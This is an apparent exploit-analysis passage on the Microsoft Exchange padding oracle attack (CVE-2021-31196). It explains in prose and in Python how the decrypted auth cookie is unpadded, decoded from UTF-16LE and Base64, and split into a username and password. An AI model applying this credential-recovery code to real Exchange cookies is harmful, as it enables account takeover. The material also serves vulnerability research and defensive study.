After completing the Padding Oracle Attack, how is the padded plaintext converted to the actual username and password?
The obtained padded plaintext is first unpadded using PKCS7 (the `unpad` function checks that the last byte value matches the number of padding bytes). Then the string is decoded as UTF-16LE (since Exchange uses Unicode), and the first two bytes are discarded (because they cannot be reliably decrypted). The remaining Base64-encoded string is decoded to reveal the actual plaintext in `username:password` format. The full username is already known from the `lgn` field in the cookie, so losing the first two characters of the username is not a problem. For more details on obtaining the cookie, refer to the companion Pwn2Own 2021 Microsoft Exchange Server Vulnerability (CVE-2021-31196) Exploitation Analysis.
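The recovery pipeline described above, as an added example that is not code from the original post or the exploit write-up: a strict PKCS#7 unpad, UTF-16LE decoding, dropping the unrecoverable leading two bytes of the decrypted buffer, re-aligning the Base64 string with a zero-bit filler character, and taking the username from the cookie's `lgn` field. The block size, the helper that constructs a sample oracle output, and the use of `A` as the alignment filler are assumptions made here.

```python
import base64

BLOCK_SIZE = 16  # assumption: AES-CBC, so the oracle output is a whole number of 16-byte blocks


def pkcs7_unpad(data: bytes, block_size: int = BLOCK_SIZE) -> bytes:
    """Strict PKCS#7 unpad: last byte is the pad length, every pad byte must carry that value."""
    if not data or len(data) % block_size:
        raise ValueError("length is not a whole number of blocks")
    n = data[-1]
    if not 1 <= n <= block_size or data[-n:] != bytes([n]) * n:
        raise ValueError("invalid PKCS#7 padding")
    return data[:-n]


def is_valid_padding(data: bytes) -> bool:
    """Boolean view of pkcs7_unpad, the same check a padding oracle leaks."""
    try:
        pkcs7_unpad(data)
        return True
    except ValueError:
        return False


def recover_credentials(padded_plaintext: bytes, lgn_username: str,
                        unreliable_prefix: int = 2) -> tuple[str, str]:
    """Turn padding-oracle output into (username, password).

    The first `unreliable_prefix` bytes of the decrypted buffer are dropped as unrecoverable.
    Each UTF-16LE code unit is one Base64 character, so one 'A' (all-zero bits) per dropped
    character restores 4-character alignment; only the leading byte(s) of the decoded text
    are then wrong, and the username is taken from the cookie's `lgn` field instead.
    """
    raw = pkcs7_unpad(padded_plaintext)
    b64 = raw[unreliable_prefix:].decode("utf-16le")
    b64 = "A" * (unreliable_prefix // 2) + b64
    decoded = base64.b64decode(b64)
    _, _, password = decoded.partition(b":")  # damaged bytes sit in the username part
    return lgn_username, password.decode()


def make_padded_plaintext(username: str, password: str) -> bytes:
    """Constructed sample oracle output: base64(user:pass) as UTF-16LE, PKCS#7 padded,
    with the first two bytes overwritten to mimic the part the attack cannot recover."""
    b64 = base64.b64encode(f"{username}:{password}".encode()).decode()
    raw = b64.encode("utf-16le")
    pad = BLOCK_SIZE - len(raw) % BLOCK_SIZE
    return b"\xff\xff" + raw[2:] + bytes([pad]) * pad
```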